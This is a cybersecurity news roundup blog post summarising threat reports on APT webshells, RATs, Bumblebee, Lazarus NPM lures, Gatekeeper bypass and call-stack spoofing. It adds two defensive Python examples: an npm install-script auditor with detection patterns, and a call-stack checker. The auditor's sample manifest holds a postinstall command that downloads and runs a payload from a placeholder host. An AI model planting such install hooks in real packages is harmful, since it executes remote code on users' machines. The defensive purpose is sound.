
Welcome to our biweekly cybersecurity roundup. In these blog posts, we feature curated articles and insights from experts, providing you with valuable information on the latest cybersecurity threats, technologies, and best practices to keep yourself and your organization safe. Whether you’re a cybersecurity professional or a concerned individual, our biweekly blog post is designed to keep you informed and empowered.

For more articles, check out our #onpatrol4malware blog.

IcePeony Hackers Exploiting Public Web Servers To Inject Webshells

Source: GBHackers

IcePeony, a China-nexus APT group, has been active since 2023, targeting India, Mauritius, and Vietnam. The group exploits SQL injection vulnerabilities in public-facing web servers to plant webshells and backdoors, and deploys a custom IIS malware called IceCache. Read more.

WrnRAT disguised as a gambling game

Source: ASEC

The attacker set up a website disguised as a gambling game; when the victim downloads the game client, malicious code is installed that can control the infected system and steal information. The malware appears to have been written by the attacker themselves and is named WrnRAT after a string found in it. Read more.

New Bumblebee Loader Infection Chain Signals Possible Resurgence

Source: Netskope

The infection likely starts via a phishing email luring the victim to download a ZIP file and extract and execute the file inside it. The ZIP file contains an LNK file named “Report-41952.lnk” that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL on disk, as observed in previous campaigns. Read more.

Stealer here, stealer there, stealers everywhere!

Source: SECURELIST

According to Kaspersky Digital Footprint Intelligence, almost 10 million devices, both personal and corporate, were attacked by information stealers in 2023. That said, the real number of the attacked devices may be even higher, as not all stealer operators publish all their logs immediately after stealing data. Read more.

Bored BeaverTail Yacht Club – A Lazarus Lure

Source: eSENTIRE

Upon installation of the malicious NPM packages through Visual Studio Code, the packages attempted to download a Python executable and associated components from a remote location via a cURL command, retrieving the initial components of the InvisibleFerret backdoor. Read more.
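The eSentire summary above describes install-time fetch-and-execute behaviour in NPM packages. The following is an added example (not from eSentire's report or the packages it analyzes) of a small audit of a package's lifecycle scripts for that pattern. The package.json content, the regex ruleset, and the URL are all constructed for illustration; the report does not state which lifecycle hook the real packages used.

```python
"""Audit an npm package.json for install-time download-and-execute behaviour.

Added example; the sample manifests and the patterns below are constructed,
not a vetted detection ruleset.
"""
import json
import re

# Hooks npm runs automatically during `npm install` (real npm lifecycle names).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics for "fetch something remote and run it" (constructed for this example).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads content with curl/wget"),
    (re.compile(r"\b(python\d?|node)\b\s+-[ce]\b"), "inline interpreter execution"),
    (re.compile(r"\bchmod\s+\+x\b"), "marks a downloaded file executable"),
    (re.compile(r"https?://"), "references a remote URL"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes a base64 payload"),
]


def audit_package_json(text):
    """Return a list of (hook, reason) findings for lifecycle scripts in `text`."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        for pattern, reason in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append((hook, reason))
    return findings


# Constructed manifests. The URL is a placeholder under the reserved .invalid TLD.
MALICIOUS_PKG = json.dumps({
    "name": "example-ui-kit",
    "version": "1.0.3",
    "scripts": {
        "postinstall": "curl -sL https://example.invalid/p.tar.gz -o /tmp/p.tar.gz "
                       "&& tar xf /tmp/p.tar.gz -C /tmp && python3 /tmp/p/run.py",
    },
})

BENIGN_PKG = json.dumps({
    "name": "example-lib",
    "version": "2.1.0",
    "scripts": {"build": "tsc", "postinstall": "node scripts/patch.js"},
})


if __name__ == "__main__":
    for label, manifest in (("malicious", MALICIOUS_PKG), ("benign", BENIGN_PKG)):
        print(label, audit_package_json(manifest))
```

A heuristic like this is a triage aid, not a verdict: a postinstall hook that runs a local script can still fetch a payload from inside that script. Installing with `npm install --ignore-scripts` and reviewing hooks before enabling them removes the automatic execution path entirely.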

Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism

Source: UNIT 42

Gatekeeper depends on the quarantine extended attribute being propagated to files that applications download or extract, so that its scan is triggered when those files are first opened. Apple assumes that third-party developers follow its guidelines on inheriting extended attributes, but that is not always the case, and any application that drops the attribute creates a weakness in the Gatekeeper mechanism. Read more.

Call stack spoofing explained using APT41 malware

Source: CYBER GEEKS

Call stacks are a telemetry source that EDR software can use to determine whether a process performed suspicious actions. The purpose of call stack spoofing is to construct a fake call stack that mimics a legitimate one, hiding activity that EDR or other security software would otherwise flag. Read more.
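To make concrete what an EDR looks for in that telemetry, here is an added example (not from the Cyber Geeks post or the APT41 sample) of the two most common call-stack sanity checks: every return address should fall inside a loaded module, and the bytes just before it should decode to a call instruction. The module map, addresses, and the "call-preceded" oracle are all constructed; a real EDR derives them by reading the target process's memory.

```python
"""Minimal call-stack sanity checks of the kind EDRs apply to their telemetry.

Added example with constructed data. Frames are return addresses listed from
innermost to outermost, as a stack walk would produce them.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, addr):
        return self.base <= addr < self.base + self.size


# Constructed module map; the load addresses are hypothetical.
MODULES = [
    Module("ntdll.dll", 0x7FF800000000, 0x200000),
    Module("kernel32.dll", 0x7FF810000000, 0x100000),
    Module("app.exe", 0x140000000, 0x50000),
]

# Return addresses that really follow a call instruction. A real EDR disassembles
# the bytes before each address; this set is a stand-in for that check.
CALL_SITES = {0x7FF800012345, 0x7FF810004567, 0x140001234}


def resolve(addr):
    """Return the module backing `addr`, or None if the address is unbacked."""
    return next((m for m in MODULES if m.contains(addr)), None)


def call_preceded(addr):
    return addr in CALL_SITES


def check_stack(frames, is_call_preceded=call_preceded):
    """Return (frame_index, address, reason) for every frame that fails a check."""
    findings = []
    for i, addr in enumerate(frames):
        mod = resolve(addr)
        if mod is None:
            findings.append((i, addr, "return address not backed by a loaded module"))
            continue
        if not is_call_preceded(addr):
            findings.append((i, addr, f"return into {mod.name} is not preceded by a call"))
    return findings


# Constructed stacks. The spoofed one has a frame returning into a private RWX
# region (0xA2F000, hypothetical) and a synthetic kernel32 frame whose return
# address does not sit after a call instruction.
LEGIT_STACK = [0x7FF800012345, 0x7FF810004567, 0x140001234]
SPOOFED_STACK = [0x7FF800012345, 0xA2F000, 0x7FF810004600, 0x140001234]


if __name__ == "__main__":
    print("legit:", check_stack(LEGIT_STACK))
    print("spoofed:", check_stack(SPOOFED_STACK))
```

Spoofing techniques that reuse genuine call-preceded gadgets defeat both checks, which is why EDRs layer additional signals (thread start addresses, unwind-info consistency, unbacked memory anywhere in the walk) on top of them.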

UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants

Source: Cisco TALOS

The latest series of attacks deploys an updated version of the RomCom malware we track as "SingleCamper". This version is loaded directly from the registry into memory and uses the loopback address to communicate with its loader. Read more.

US disables Anonymous Sudan infrastructure linked to DDoS attack spree

Source: CYBERSECURITY DIVE

“The FBI’s seizure of this powerful attack tool successfully disabled the attack platform that caused widespread damage and destruction to critical infrastructure and networks across the world,” Rebecca Day, special agent in charge of the FBI Anchorage field office, said in a statement. Read more.

New FASTCash malware Linux variant helps steal money from ATMs

Source: BLEEPING COMPUTER

North Korean hackers are using a new Linux variant of the FASTCash malware to infect the payment switch systems of financial institutions and perform unauthorized cash withdrawals. Read more.